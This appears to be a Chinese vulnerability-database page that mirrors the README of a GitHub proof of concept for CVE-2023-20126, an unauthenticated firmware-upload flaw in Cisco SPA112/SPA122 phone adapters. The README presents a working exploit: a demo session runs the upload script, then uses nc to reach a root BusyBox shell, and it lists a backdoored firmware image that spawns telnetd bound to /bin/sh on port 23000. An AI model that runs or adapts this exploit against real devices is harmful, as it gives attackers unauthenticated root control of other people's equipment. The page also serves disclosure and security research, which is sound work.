漏洞平台

POC详情： 6cad69cce0ea6f379d2b0e93b0aef56e3cb7115e

来源

https://github.com/fullspectrumdev/RancidCrisco

关联漏洞

标题： Cisco SPA112 2-Port Phone Adapter 访问控制错误漏洞 (CVE-2023-20126)
描述：Cisco SPA112 2-Port Phone Adapter是美国思科（Cisco）公司的一款电话适配器。 Cisco SPA112 2-Port Phone Adapters存在安全漏洞，该漏洞源于固件升级功能中缺少身份验证过程，可能允许攻击者以完全权限在受影响的设备上执行任意代码。

描述

PoC for CVE-2023-20126

介绍

# RancidCrisco
Minimum Viable PoC for CVE-2023-20126

This is the initial release. It works, but its the 'simplest case' exploit.

Tested and working on SPA112/SPA122 - SPA232D requires a different firmware image. 

Gives a root-shell on port 23000/tcp.

I still need to clean up the toolchain used for editing the firmware and will probably put that in a different repo. It is mostly based on the work of @BigNerd95, but with minor alterations to work on the SPA112/122 firmware files.

## Demo.

```
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin 
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.

< wait a few mins, nervously > 

$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????


BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0
```

## Files

- fwupload.py - firmware image uploader that bypasses auth by simply not sending any, exploiting CVE-2023-20126. takes two arguments: URL of the devices Web UI, and firmware file to upload.
- telnet-23000.bin - Proof of Concept malicious firmware image that spawns `telnetd -l /bin/sh -p 23000`, giving a root shell on port 23000/tcp. Based on work by bignerd95.

## Licence
WTFPL.

## Bugs
use git issue. 

## Disclaimer
If this bricks your fucking device, I don't take any responsibility.   
That is YOUR problem.  
I mean, I hacked together that backdoored firmware in an evening.  
Also, why aren't you following the writeup and building your own backdoored firmware?

文件快照


 [4.0K]  /data/pocs/6cad69cce0ea6f379d2b0e93b0aef56e3cb7115e
├── [1.6K]  fwupload.py
├── [1.9K]  README.md
└── [ 10M]  telnet-23000.bin

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。